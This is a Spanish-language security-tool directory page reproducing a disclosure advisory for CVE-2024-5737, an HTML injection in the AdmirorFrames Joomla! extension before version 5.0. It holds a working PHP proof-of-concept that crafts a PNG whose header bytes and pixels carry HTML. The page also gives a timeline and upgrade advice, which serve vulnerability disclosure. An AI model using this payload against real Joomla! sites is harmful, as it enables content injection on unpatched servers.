Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-5737 — AdmirorFrames Extensión Joomla! < 5.0 - Inyección HTML | Kitploit
Herramientas/GitHubGitHub/afine-com/cve-2024-5737
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebMala Configuración
GitHubafine-com/cve-2024-5737

CVE-2024-5737

AdmirorFrames Extensión Joomla! < 5.0 - Inyección HTML

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-5737

AdmirorFrames Extensión de Joomla! < 5.0 - Inyección HTML

Cronología

  • Vulnerabilidad reportada al proveedor: 26.01.2024
  • Nueva versión corregida 5.0 publicada: 06.06.2024
  • Divulgación pública: 28.06.2024

Descripción

Inyección HTML en la extensión AdmirorFrames de Joomla! en el archivo afGdStream.php que no establece el valor del encabezado Content-Type antes de enviar los datos de la imagen. Esto provoca que PHP envíe el valor predeterminado de este encabezado (text/html) y hace que los datos de la imagen se interpreten como un documento HTML.

Ejemplo de script PHP que genera un PNG con los campos de ancho y alto establecidos en la etiqueta HTML <s>:

root@kitploit:~
<?php
$_payload="AAA";
if(strlen($_payload)%3!=0){
 echo "payload%3==0 !\n"; exit();
}
$_pay_len=strlen($_payload);
echo "LEN: $_pay_len\n";
$width=0x733e; //<s>
$height=0x3c;
$im = imagecreate($width, $height);

$_hex=unpack('H*',$_payload);
$_chunks=str_split($_hex[1], 6);

for($i=0; $i < count($_chunks); $i++){

  $_color_chunks=str_split($_chunks[$i], 2);
  $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));

  imagesetpixel($im,$i,1,$color);

}

imagepng($im,"example.png");

Resultado de la representación del archivo example.png de prueba de concepto por parte del navegador web: prueba de concepto

Este problema fue causado por el uso del valor predeterminado del encabezado Content-Type. Este problema se ha corregido en la extensión AdmirorFrames de Joomla! en la versión 5.0.

Versiones afectadas

< 5.0

Aviso

Actualice la extensión AdmirorFrames de Joomla! a la versión 5.0 o superior.

Referencias

  • https://github.com/vasiljevski/admirorframes/issues/3
  • https://cert.pl/en/posts/2024/06/CVE-2024-5735/
  • https://cert.pl/posts/2024/06/CVE-2024-5735/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-5737
Descargar herramienta